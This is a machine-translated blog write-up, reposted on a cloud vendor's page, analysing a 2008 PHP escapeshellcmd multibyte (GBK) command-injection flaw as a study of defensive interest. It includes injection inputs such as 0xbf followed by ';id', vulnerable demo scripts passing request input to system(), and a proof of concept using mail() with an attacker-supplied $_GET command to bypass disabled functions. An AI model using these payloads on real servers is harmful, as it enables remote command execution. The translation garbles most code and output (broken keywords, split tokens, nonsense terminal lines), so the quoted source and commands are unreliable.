PHP escapeshellcmd multi-byte encoding Vulnerability Parsing and extension

Source: Internet
Author: User
Vulnerability announcement in http://www.sektioneins.de/advisories/SE-2008-03.txt

PHP 5 <= 5.2.5
PHP 4 <= 4.4.8

Some systems that allow such as GBK, EUC-KR, sjis and other wide byte character set can be affected, the impact is still very large, the domestic virtual host should be kill, after testing this vulnerability, I found it very interesting. I have also studied this type of security vulnerability before, so I wrote the related vulnerability explanations and some of my own ideas, we also hope that some domestic platforms with vulnerabilities can quickly respond and fix the vulnerabilities.
This vulnerability occurs in PHP functions used to escape command line strings. These functions use the php_escape_shell_cmd function at the underlying layer. Let's take a look at the processing process:

/* {Php_escape_shell_cmd
Escape all chars that cocould possibly be used
Break out of a shell command

This function emalloc's a string and returns the pointer.
Remember to efree it when done with it.

* Not * safe for Binary strings
*/
Char * php_escape_shell_cmd (char * Str ){
Register int X, Y, L;
Char * cmd;
Char * P = NULL;

L = strlen (STR );
Cmd = safe_emalloc (2, L, 1 );

For (x = 0, y = 0; x <L; X ++ ){
Switch (STR [x]) {
Case '"':
Case '\'':
# Ifndef php_win32
If (! P & (P = memchr (STR + x + 1, STR [X], l-x-1 ))){
/* Noop */
} Else if (P & * P = STR [x]) {
P = NULL;
} Else {
CMD [y ++] = '\\';
}
CMD [y ++] = STR [x];
Break;
# Endif
Case '#':/* This is character-set independent */
Case '&':
Case ';':
Case ''':
Case '| ':
Case '*':
Case '? ':
Case '~ ':
Case '<':
Case '> ':
Case '^ ':
Case '(':
Case ')':
Case '[':
Case ']':
Case '{':
Case '}':
Case '$ ':
Case '\\':
Case '\ x0a':/* excluding these two */
Case '\ xFF ':
# Ifdef php_win32
/* Since Windows does not allow us to escape these chars, just remove them */
Case '% ':
CMD [y ++] = '';
Break;
# Endif
CMD [y ++] = '\\';
/* Fall-through */
Default:
CMD [y ++] = STR [x];

}
}
CMD [y] = '\ 0 ';
Return cmd;
}
/*}}}*/

As you can see, PHP adds ",',#,&,;..... the special characters in the shell command line can be changed to \ "by adding \ to the front \". \',\#,\&,\;...... to avoid the command injection vulnerability. In PHP's opinion, as long as these characters are filtered out and sent to functions such as system, the parameters are safe. The usage examples in the PHP manual are as follows:

<? PHP
$ E = escapeshellcmd ($ userinput );

// Here we don't care if $ e has Spaces
System ("Echo $ e ");
$ F = escapeshellcmd ($ filename );

// And here we do, so we use quotes
System ("Touch \"/tmp/$ f \ "; LS-L \"/tmp/$ F "");
?>

Obviously, if the processing is not performed by escapeshellcmd and the user inputs hello; id, the system will execute the following command:

Echo hello; ID

In shell, the command is split, which not only echo hello, but also executes the id command, resulting in a command injection vulnerability. After processing with escapeshellcmd, the command becomes:

Echo Hello \; ID

In this way, the command will only be ECHO, and all others will be echo parameters, which is safe.

Is that actually true? PHP does nothing after processing the parameters is sent to the system. The subsequent work is actually completed by Linux. How does Linux Process these parameters? When running commands in Linux, some environment variables are used to indicate the working environment. For example, PWD indicates the current working environment, and uid indicates your identity, bash stands for the command interpreter and so on ...... when executing commands in Linux, there is also a very important parameter Lang, which determines how the Linux Shell processes your input, in this way, when you enter some Chinese characters, Linux can recognize them without understanding errors between people and the system. By default, Linux Lang is a en_US.UTF-8, UTF-8 is a very safe Character Set, its series contains its own validation, so there is no error, it will work well. Some systems support multi-byte character sets, such as GBK, which is the most common situation in China. You can set lang = zh_cn.gbk so that your input will be processed as GBK encoding, while GBK is dubyte, the valid GBK encoding will be considered as a character.
As you can see, in the PHP processing process, it is a single-byte processing, it only treats the input as a byte stream, and when Linux sets the GBK character set, its processing is dual-byte, which is obviously different from everyone's understanding. We can check that the GBK character set range is 8140-fefe, the first byte is between 81-fe, the last byte is between 40-fe, and a very important character \ is encoded as 5C, within the range of the last byte of GBK, we consider a special input:

0xbf; ID
Or 0xbf 'id

After PHP escapeshellcmd single-byte transcoding

0xbf5c; ID
0xbf5c 'id

Note that 0xbf5c is a valid GBK encoding, so during Linux execution, the input is

[0 xbfbc]; ID

Well, the subsequent ID will be executed. You can make a simple experiment as follows:

[Loveshell @ loveshell TMP] $ echo success
>
?
[Loveshell @ loveshell TMP] $ set | grep-I Lang
Lang = zh_cn.gb2312
Langvar = en_US.UTF-8
[Loveshell @ loveshell TMP] $ export lang = zh_cn.gbk
[Loveshell @ loveshell TMP] $ echo success
Bytes
[Loveshell @ loveshell TMP] $ set | grep-I Lang
Lang = zh_cn.gbk
Langvar = en_US.UTF-8
[Loveshell @ loveshell TMP] $

The encoding is 0xbf5c. We can see that when Lang is not set to GBK, the encoding is an invalid gb2312 encoding, so it is considered to be two characters, so the 0x5c contained in it takes effect, it is considered that the command is not over. Then we set the encoding to GBK, And the encoding will be considered as a character for ECHO.
How can we prove the PHP vulnerability?

<? PHP
$ E = escapeshellcmd ($ _ Get [c]);
// Here we don't care if $ e has Spaces
System ("Echo $ e ");
?>

As an example, the above Code works very well under normal circumstances, and we submit

Exp. php? C = loveshell % BF; ID

Result returned

Loveshell? ID

Let's take a look at the above Code.

<? PHP
Putenv ("lang = zh_cn.gbk ");
$ E = escapeshellcmd ($ _ Get [c]);
// Here we don't care if $ e has Spaces
System ("Echo $ e ");
?>

The putenv function of PHP is used to modify the runtime environment variables of PHP. After Lang is modified, submit the preceding parameters and you will see:

Loveshell nobody uid = 99 (nobody) gid = 4294967295 groups = 4294967295

The command is successfully executed. You need to set the environment variable here. Of course, some machines may have set Lang to GBK. Therefore, some machines that use escapeshellcmd to filter input may have problems. The essence here is that Linux and PHP do not have the same understanding of the parameters, while the mail function of PHP still relies on the system to execute the sendmail command at the underlying level, and supports adding parameters to the sendmail command, however, the parameter is filtered out, but we can filter bypass on the Multi-byte encoding machine.
Some code snippets of the mail function are as follows:

......
If (PG (safe_mode) & (zend_num_args () = 5 )){
Php_error_docref (null tsrmls_cc, e_warning, "safe mode restriction in effect. The specified th parameter is disabled in safe mode .");
Return_false;
}

If (zend_parse_parameters (zend_num_args () tsrmls_cc, "Sss | SS ",
& To, & to_len,
& Subject, & subject_len,
& Message, & message_len,
& Headers, & headers_len,
& Extra_cmd, & extra_assist_len
) = Failure ){
Return;
}
......

If (force_extra_parameters ){
Extra_cmd = estrdup (force_extra_parameters );
} Else if (extra_cmd ){
Extra_cmd = php_escape_shell_cmd (extra_cmd );
}

If (php_mail (to_r, subject_r, message, headers, extra_cmd tsrmls_cc )){
Retval_true;
} Else {
Retval_false;
}
.....

If the security mode is not used, the fifth parameter is allowed. The fifth parameter, as the extra_cmd parameter, is filtered by php_escape_shell_cmd and sent to the php_mail function as the fifth parameter. The fragment in php_mail is as follows:

......
If (extra_cmd! = NULL ){
Sendmail_cmd = emalloc (strlen (sendmail_path) + strlen (extra_cmd) + 2 );
Strcpy (sendmail_cmd, sendmail_path );
Strcat (sendmail_cmd ,"");
Strcat (sendmail_cmd, extra_cmd );
} Else {
Sendmail_cmd = sendmail_path;
}

# Ifdef php_win32
Sendmail = popen (sendmail_cmd, "WB ");
# Else
/* Since popen () doesn't indicate if the internal fork () doesn't work
* (E.g. The shell can't be executed) We explicitely set it to 0 to be
* Sure we don't catch any older errno value .*/
Errno = 0;
Sendmail = popen (sendmail_cmd, "W ");
......

Extra_cmd is attached to the Sendmail path as a parameter. here we can use this vulnerability to execute commands in environments where dangerous functions such as system are disabled. The poc I wrote is as follows:

<? PHP
// PHP disable function bypass Vul
// By Stefan Esser
// POC by loveshell

Putenv ("lang = zh_cn.gbk ");
Mail ("loveshell@loveshell.net", "", "XXXX". CHR (0xbf). ";". $ _ Get [c]);
?>

It can be run on a machine that supports GBK, and other character sets should be the same. It can be used with a slight modification. As for patching, I want to upgrade to the new version as soon as possible, or pull the mail function into your blacklist.
The essence of this vulnerability is that it is caused by inconsistent understanding when processing data. It is easy to discover the shadows of the previous problems. Inconsistent processing of PHP and MySQL leads to injection. Inconsistent processing of program and browser HTML leads to XSS. XML injection is caused by inconsistent processing of XML .... here we can see that the command injection is caused by inconsistency in Linux Shell processing. It is expected that, in other scripting languages such as Perl, such problems may occur in areas involving character set processing. The character set represents how the system treats input data. Different character sets give different information. In some character sets, as long \,', | these special characters may cause problems when they fall into the second byte range, for example

Sjis
[\ X20-\ x7e] | [\ xA1-\ xdf] | ([\ x81-\ x9f] | [\ xe0-\ XeF]) ([\ X40-\ x7e] | [\ X80-\ xfc])

\ X40-\ x7e includes \ x5c, resulting in problems. We should consider this factor when designing programs to deal with programs or protocols at other levels, so as to ensure consistency in handling and avoid problems. To Stefan Esser again, Stefan Esser is my hero! :)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.